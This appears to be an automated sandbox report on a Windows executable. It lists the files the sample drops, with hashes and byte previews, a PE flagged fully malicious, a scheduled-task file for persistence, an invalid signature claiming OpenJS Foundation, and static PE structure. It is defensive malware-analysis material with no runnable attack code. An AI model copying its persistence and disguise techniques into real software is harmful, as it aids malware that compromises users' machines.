SSDEEP:	24576:nZpjsNEfC0MflWQt7hCFbE+az7H+cwTYWWTDx+NV5NS7hMuyoPiR8lT1nHVGRAn:nGX0MfgUwpE+a/9CMTDoX5NKMKS8F5M0
MD5:	E11362AB856AD40E432C9AA356EA7FB0
SHA1:	D20E84D3054271DE92A785627BDA5EC1C3007BDE
SHA-256:	2EE91362BBE22AADA4D879FA18DFC5FDA57700BD8255B084789339C6950148A2
SHA-512:	ECCA4E8BECC0E3AEDE806AA0B45EE648085F821A597A7E827D401AE92EA68E371E967C511B44E2D4CDE114F05BD52768BAD0B3E26D5B8CD9F4EEBB27F8FBABDA
Malicious:	false
Preview:	.PNG........IHDR...P............7.. .IDATx..;..G..z.....{-A....m..}A........#w.#W.=..&.r.....6..........W\.dFg......F.o...:.2.A.q...........}./ ..`.....6.c...../.~.\|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x.......$...$..uC...[c$.1p...`.FH>..[H>..#B.d.uU....@k..[f^uwg0$...v.c.G.u......2.n...b..V.@... ......g..@.%.c.0..?s}.0v..&..1...K...1..#..}......$.....6..k.D..n.~e.....H..K)..A..+\|..$[.\|.u]........Rp....^.1&...M...p.=...H........~%......{.{.........."h.......@S...>..A...B..o..w....a..4[7.9...q....\|$....H..Xh:..W.H..%..O..G..V..e...\|...b....B....N..............7..[...d-.:.~....c...............-.o............9.....,...-.-.oj.=....{.\|.$c\|..J.Ld..`.J.)Qi=......d..h.V.....`Z.j.AB...K.7=...k.....p!.^..j.Q...8....-..$.....~]:..$..(_J...C..RH.....o..!....H>..EA.dH...T.....Jr...v.bD....B........6.{....._.... P.{....m

C:\Users\user\AppData\Local\Temp\d3e71663

Download File

Process:	C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
File Type:	data
Category:	dropped
Size (bytes):	1276017
Entropy (8bit):	7.663037680659601
Encrypted:	false
SSDEEP:	24576:02IvDr159I4l3Jc3uBrXbo0B/QlR1p7TJ8zfAY72QDd:23i3uBrcn1tJAx2wd
MD5:	3ECE2647944A5E70F0BE39F183732A13
SHA1:	97AB9ECDCE347369E3AF1EF32E5DFFEC484C413E
SHA-256:	5A9B859CD0C5BD1AF699953A4D0030E39E3F458283A9D07499265277667168CA
SHA-512:	B5BACAAC468F7094B733E0D0E024F38E58D2A8955F40C950DDBC65DD690668A15BA0F3F18E9B6EB1CC92B144D865EC89B6DC0293D3B5DC9F4C4E7B49BF2F13C7
Malicious:	false
Preview:	..=v..=v..=v..=v..=v.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..<v..m&..i7..p...R...I..S...N..\...p...a&..Z...N*..\...Mv..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t...T...G...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..~...I...N...^...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t8..oS..T...N....8..a0..P...O...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v...F..A.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v

C:\Users\user\AppData\Local\Temp\dc28f109

Download File

Process:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
File Type:	PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1404020
Entropy (8bit):	7.994316031132943
Encrypted:	true
SSDEEP:	24576:nZpjsNEfC0MflWQt7hCFbE+az7H+cwTYWWTDx+NV5NS7hMuyoPiR8lT1nHVGRAn:nGX0MfgUwpE+a/9CMTDoX5NKMKS8F5M0
MD5:	E11362AB856AD40E432C9AA356EA7FB0
SHA1:	D20E84D3054271DE92A785627BDA5EC1C3007BDE
SHA-256:	2EE91362BBE22AADA4D879FA18DFC5FDA57700BD8255B084789339C6950148A2
SHA-512:	ECCA4E8BECC0E3AEDE806AA0B45EE648085F821A597A7E827D401AE92EA68E371E967C511B44E2D4CDE114F05BD52768BAD0B3E26D5B8CD9F4EEBB27F8FBABDA
Malicious:	false
Preview:	.PNG........IHDR...P............7.. .IDATx..;..G..z.....{-A....m..}A........#w.#W.=..&.r.....6..........W\.dFg......F.o...:.2.A.q...........}./ ..`.....6.c...../.~.\|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x.......$...$..uC...[c$.1p...`.FH>..[H>..#B.d.uU....@k..[f^uwg0$...v.c.G.u......2.n...b..V.@... ......g..@.%.c.0..?s}.0v..&..1...K...1..#..}......$.....6..k.D..n.~e.....H..K)..A..+\|..$[.\|.u]........Rp....^.1&...M...p.=...H........~%......{.{.........."h.......@S...>..A...B..o..w....a..4[7.9...q....\|$....H..Xh:..W.H..%..O..G..V..e...\|...b....B....N..............7..[...d-.:.~....c...............-.o............9.....,...-.-.oj.=....{.\|.$c\|..J.Ld..`.J.)Qi=......d..h.V.....`Z.j.AB...K.7=...k.....p!.^..j.Q...8....-..$.....~]:..$..(_J...C..RH.....o..!....H>..EA.dH...T.....Jr...v.bD....B........6.{....._.... P.{....m

C:\Users\user\AppData\Local\Temp\dcbc2b90

Download File

Process:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
File Type:	PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1404020
Entropy (8bit):	7.994316031132943
Encrypted:	true
SSDEEP:	24576:nZpjsNEfC0MflWQt7hCFbE+az7H+cwTYWWTDx+NV5NS7hMuyoPiR8lT1nHVGRAn:nGX0MfgUwpE+a/9CMTDoX5NKMKS8F5M0
MD5:	E11362AB856AD40E432C9AA356EA7FB0
SHA1:	D20E84D3054271DE92A785627BDA5EC1C3007BDE
SHA-256:	2EE91362BBE22AADA4D879FA18DFC5FDA57700BD8255B084789339C6950148A2
SHA-512:	ECCA4E8BECC0E3AEDE806AA0B45EE648085F821A597A7E827D401AE92EA68E371E967C511B44E2D4CDE114F05BD52768BAD0B3E26D5B8CD9F4EEBB27F8FBABDA
Malicious:	false
Preview:	.PNG........IHDR...P............7.. .IDATx..;..G..z.....{-A....m..}A........#w.#W.=..&.r.....6..........W\.dFg......F.o...:.2.A.q...........}./ ..`.....6.c...../.~.\|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x.......$...$..uC...[c$.1p...`.FH>..[H>..#B.d.uU....@k..[f^uwg0$...v.c.G.u......2.n...b..V.@... ......g..@.%.c.0..?s}.0v..&..1...K...1..#..}......$.....6..k.D..n.~e.....H..K)..A..+\|..$[.\|.u]........Rp....^.1&...M...p.=...H........~%......{.{.........."h.......@S...>..A...B..o..w....a..4[7.9...q....\|$....H..Xh:..W.H..%..O..G..V..e...\|...b....B....N..............7..[...d-.:.~....c...............-.o............9.....,...-.-.oj.=....{.\|.$c\|..J.Ld..`.J.)Qi=......d..h.V.....`Z.j.AB...K.7=...k.....p!.^..j.Q...8....-..$.....~]:..$..(_J...C..RH.....o..!....H>..EA.dH...T.....Jr...v.bD....B........6.{....._.... P.{....m

C:\Users\user\AppData\Local\Temp\dcc83b80

Download File

Process:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
File Type:	data
Category:	dropped
Size (bytes):	1276017
Entropy (8bit):	7.663050492492285
Encrypted:	false
SSDEEP:	24576:b2IvDr159I4l3Jc3uBrXbo0B/QlR1p7TJ8zfAY72QDd:d3i3uBrcn1tJAx2wd
MD5:	3DEFAEE4278E5340B030739CA1E2BCED
SHA1:	BFEF9CCC147E484807C890D7F9B23401810EF4B9
SHA-256:	4AFE0EB47487B3CB992366E2B950C5B7820E6165A7862BEF800CC22E4102CDB8
SHA-512:	BB1123C88F605753802A84F2954DB83E25337B7A09A3F3ABB7EF125A030159105654A5C8C632A7D9532AB82AAF326A90CBDAD82547B00066E7DD8B09CBBDC775
Malicious:	false
Preview:	..=v..=v..=v..=v..=v.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..<v..m&..i7..p...R...I..S...N..\...p...a&..Z...N*..\...Mv..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t...T...G...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..~...I...N...^...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t8..oS..T...N....8..a0..P...O...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v...F..A.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v

C:\Users\user\AppData\Local\Temp\dd72ccef

Download File

Process:	C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
File Type:	data
Category:	dropped
Size (bytes):	1276017
Entropy (8bit):	7.663050492492285
Encrypted:	false
SSDEEP:	24576:b2IvDr159I4l3Jc3uBrXbo0B/QlR1p7TJ8zfAY72QDd:d3i3uBrcn1tJAx2wd
MD5:	3DEFAEE4278E5340B030739CA1E2BCED
SHA1:	BFEF9CCC147E484807C890D7F9B23401810EF4B9
SHA-256:	4AFE0EB47487B3CB992366E2B950C5B7820E6165A7862BEF800CC22E4102CDB8
SHA-512:	BB1123C88F605753802A84F2954DB83E25337B7A09A3F3ABB7EF125A030159105654A5C8C632A7D9532AB82AAF326A90CBDAD82547B00066E7DD8B09CBBDC775
Malicious:	false
Preview:	..=v..=v..=v..=v..=v.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..<v..m&..i7..p...R...I..S...N..\...p...a&..Z...N*..\...Mv..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t...T...G...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..~...I...N...^...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t8..oS..T...N....8..a0..P...O...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v...F..A.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v

C:\Users\user\AppData\Local\Temp\djivmxg

Download File

Process:	C:\Windows\SysWOW64\comp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	544256
Entropy (8bit):	6.52754951546901
Encrypted:	false
SSDEEP:	12288:F/zTlHFqRB2rAikFpF5ibr4jGq88DUqlL6PHtqekY:cRBzj5ifj8DHoftqeH
MD5:	BE34377934380A888F46809916989EF2
SHA1:	B2E98C16C4F19E128EB243E5427C2904A6D8D9FD
SHA-256:	9ECACDB5102C2543CFEA48CB11808EB7C92331F5F3D107990271F9D53CAB20FD
SHA-512:	B26303F92EA1E387BBE4C4DE7961255D3485B77E5FD621D79F59CCBB7ECFAE5AC5E160AA4D93896DB978D6D1864703967B1DF58C8439490E0B9F947652D1533D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...........)...../.r.........)...../.................+......+.?....#.............(....Rich...........PE..L....m.\..........................................@.......................................@..................................5...................................E..l...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bhla.......... ......................@...................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\pbxllkvlhugf

Download File

Process:	C:\Windows\SysWOW64\comp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	544256
Entropy (8bit):	6.52754951546901
Encrypted:	false
SSDEEP:	12288:F/zTlHFqRB2rAikFpF5ibr4jGq88DUqlL6PHtqekY:cRBzj5ifj8DHoftqeH
MD5:	BE34377934380A888F46809916989EF2
SHA1:	B2E98C16C4F19E128EB243E5427C2904A6D8D9FD
SHA-256:	9ECACDB5102C2543CFEA48CB11808EB7C92331F5F3D107990271F9D53CAB20FD
SHA-512:	B26303F92EA1E387BBE4C4DE7961255D3485B77E5FD621D79F59CCBB7ECFAE5AC5E160AA4D93896DB978D6D1864703967B1DF58C8439490E0B9F947652D1533D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...........)...../.r.........)...../.................+......+.?....#.............(....Rich...........PE..L....m.\..........................................@.......................................@..................................5...................................E..l...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bhla.......... ......................@...................................................................................................................................................................................................................................................................

C:\Windows\Tasks\ServiceHub Controller.job

Download File

Process:	C:\Windows\SysWOW64\comp.exe
File Type:	data
Category:	dropped
Size (bytes):	278
Entropy (8bit):	3.5207850851862132
Encrypted:	false
SSDEEP:	6:mzQu8fFMsUEZglJPZCylQJ7tFYSoQI/uy0lbqglP1:RumFMsMJPfQI/uV13
MD5:	ED8615CBCCCC6C24981A4F45857FC1BA
SHA1:	6871B3107392584509E48AE45DC7B38D6A1DAE4D
SHA-256:	2E9DBE1ACBD267749101386CB3D3F8C524BA8E318A151A1DDDBB5C6BB5F53175
SHA-512:	96C3B663DF515D07D30F38825B8C31F95F2D2F4C4D95DED43873CB03AC1AD6C6731B50D81C281DF047890DA0E71A5048FF496BB82B3A53AD43E321122DB0BF18
Malicious:	false
Preview:	.........ZdB.n..m?..F.......<... ................ ....................7.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.l.s.S.e.r.v.e.r.\.Q.T.A.g.e.n.t._.4.0...e.x.e.........T.I.N.A.-.P.C.\.t.i.n.a...................0.........1.....................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.568075035654234
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
File size:	13'599'640 bytes
MD5:	c52c721e095a91bb0d589dd0206d5f3d
SHA1:	2089df73d6ec0b8c193ddf39bda7e603a0a0bd0a
SHA256:	331f38a2128e273ac865be7c6722d4107ebf0cc77a5abd46965492dbad0fadf5
SHA512:	7b443010ea96dd5af76d025e86625697a6598e7c56937ca894fc70cebaef145ad7022ee08176f388b188ed958b392ca4dfee97528de9830ad0ae19708c60d87b
SSDEEP:	393216:FaiZooCZlPTqI33zfLZhCWZgiXwVsHVsSjsi4AlB969ChJhE8ZI+0:FKLgVsTlxlzvo
TLSH:	B7D6D013B680543BD0671A3A8C2B97A56D3FBE203A268DD76BB46C8C0F357817D25787
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0f3bfcfc7979130e

Static PE Info

General

Entrypoint:	0x912ea4
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x53E1E43C [Wed Aug 6 08:15:56 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9e472ee86ae4f761d7e7f5369c909694

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	01/10/2020 20:00:00 18/12/2023 07:00:00
Subject Chain	CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
Version:	3
Thumbprint MD5:	8E8056A2284F0304445ED325353454BF
Thumbprint SHA-1:	E16BB6EE4ED3935C46C356D147E811286BA4BBFE
Thumbprint SHA-256:	968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
Serial:	038EDB2FC6E405731A760F1516144C85

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 00000009h
push 00000000h
push 00000000h
dec ecx
jne 00007F6978AFFFCBh
push ecx
mov eax, 00902D2Ch
call 00007F69785FA11Bh
xor eax, eax
push ebp
push 00913101h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
mov eax, dword ptr [009367ACh]
mov eax, dword ptr [eax]
call 00007F697875BF35h
lea edx, dword ptr [ebp-14h]
mov eax, 00000001h
call 00007F69785F1C88h
mov eax, dword ptr [ebp-14h]
mov edx, 0091311Ch
call 00007F69785F6ED3h
jne 00007F6978AFFFD9h
xor eax, eax
call 00007F6978AE2C6Eh
lea edx, dword ptr [ebp-18h]
mov eax, 00000001h
call 00007F69785F1C65h
mov eax, dword ptr [ebp-18h]
mov edx, 00913134h
call 00007F69785F6EB0h
jne 00007F6978AFFFD9h
xor eax, eax
call 00007F6978AEA0A3h
lea edx, dword ptr [ebp-1Ch]
mov eax, 00000001h
call 00007F69785F1C42h
mov eax, dword ptr [ebp-1Ch]
mov edx, 00913150h
call 00007F69785F6E8Dh
jne 00007F6978AFFFD9h
xor eax, eax
call 00007F6978AEC3D8h
lea edx, dword ptr [ebp-20h]
mov eax, 00000001h
call 00007F69785F1C1Fh
mov eax, dword ptr [ebp-20h]
mov edx, 00913174h
call 00007F69785F6E6Ah
jne 00007F6978AFFFD9h
xor eax, eax
call 00007F6978AE6B0Dh
lea edx, dword ptr [ebp-24h]
mov eax, 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5d9000	0x5504	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x643000	0x1f3d26	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xcf6520	0x1e78
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e2000	0x60ab8
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5e1000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5d9fbc	0xcd8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x5df000	0x8f6	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x50ddf4	0x50de00	fc6cc79d6ca6ea0c8da8814a39bbe7ce	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x50f000	0x4294	0x4400	6ac8f04f8a720d4d2a77f5a0672b4385	False	0.47506893382352944	data	6.215259000231368	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x514000	0x22f1c	0x23000	aa33e21e9305d922a9bd46c69a3e31ed	False	0.4722865513392857	data	6.467275977175512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x537000	0xa1f90	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5d9000	0x5504	0x5600	0abc2f57bd03b8a36a1efe5056c2abc5	False	0.302734375	data	5.272161535175131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x5df000	0x8f6	0xa00	c11dbc6817004ff35b3bdefe6f0233ae	False	0.3390625	data	3.9282350697867483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5e0000	0xbc	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5e1000	0x18	0x200	a73894ac51114a1877dfce9dde2aac91	False	0.052734375	data	0.17014565200323517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5e2000	0x60a80	0x60c00	94af7743f162bac00c41a551757fa177	False	0.5484672763242894	data	6.698598102325675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x643000	0x1f3d26	0x1f3e00	4036dd8b8ff1f225c09b5eb9842db991	False	0.8111451691047762	data	7.640674116196193	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
ETYM	0x645e84	0x156c74	PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced	English	United States	0.9941558837890625
UNICODEDATA	0x79caf8	0x723f	data			0.36769583205115053
UNICODEDATA	0x7a3d38	0x7ebd	data			0.42552011095700415
UNICODEDATA	0x7abbf8	0x6a8	data			0.5985915492957746
UNICODEDATA	0x7ac2a0	0xaf7d	data			0.4191430161380078
UNICODEDATA	0x7b7220	0xd3cf	data			0.4500857569666009
UNICODEDATA	0x7c45f0	0x14c5	data			0.6482979123565921
RT_CURSOR	0x7c5ab8	0x134	data	Spanish	Argentina	0.4935064935064935
RT_CURSOR	0x7c5bec	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x7c5d20	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x7c5e54	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x7c5f88	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x7c60bc	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x7c61f0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_CURSOR	0x7c6324	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.19385026737967914
RT_CURSOR	0x7c6610	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.18716577540106952
RT_CURSOR	0x7c68fc	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.2179144385026738
RT_CURSOR	0x7c6be8	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.21122994652406418
RT_CURSOR	0x7c6ed4	0x134	AmigaOS bitmap font "(", fc_YSize 4294967064, 3584 elements, 2nd "\377\270w\377\377\370\177\377\377\370\177\377\377\370\177\377\377\370\177\377\377\370\177\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	German	Germany	0.32792207792207795
RT_CURSOR	0x7c7008	0x134	data			0.42207792207792205
RT_CURSOR	0x7c713c	0x134	Targa image data 64 x 65536 x 1 +32 "\001"			0.3538961038961039
RT_CURSOR	0x7c7270	0x134	data	Spanish	Argentina	0.39285714285714285
RT_CURSOR	0x7c73a4	0x134	Targa image data 64 x 65536 x 1 +32 "\001"			0.3961038961038961
RT_CURSOR	0x7c74d8	0x134	Targa image data 64 x 65536 x 1 +32 "\001"			0.31493506493506496
RT_CURSOR	0x7c760c	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	English	United States	0.32792207792207795
RT_CURSOR	0x7c7740	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	German	Germany	0.5292207792207793
RT_CURSOR	0x7c7874	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.18983957219251338
RT_CURSOR	0x7c7b60	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.19117647058823528
RT_CURSOR	0x7c7e4c	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.19786096256684493
RT_CURSOR	0x7c8138	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.18983957219251338
RT_CURSOR	0x7c8424	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.19518716577540107
RT_CURSOR	0x7c8710	0x2ec	Targa image data 64 x 65536 x 1 +32 "\004"	German	Germany	0.19518716577540107
RT_CURSOR	0x7c89fc	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_BITMAP	0x7c8b30	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x7c8d00	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x7c8ee4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x7c90b4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x7c9284	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x7c9454	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x7c9624	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x7c97f4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x7c99c4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x7c9b94	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x7c9d64	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5208333333333334
RT_BITMAP	0x7c9e24	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42857142857142855
RT_BITMAP	0x7c9f04	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.4955357142857143
RT_BITMAP	0x7c9fe4	0xb0	Device independent bitmap graphic, 9 x 9 x 4, image size 72	English	United States	0.3977272727272727
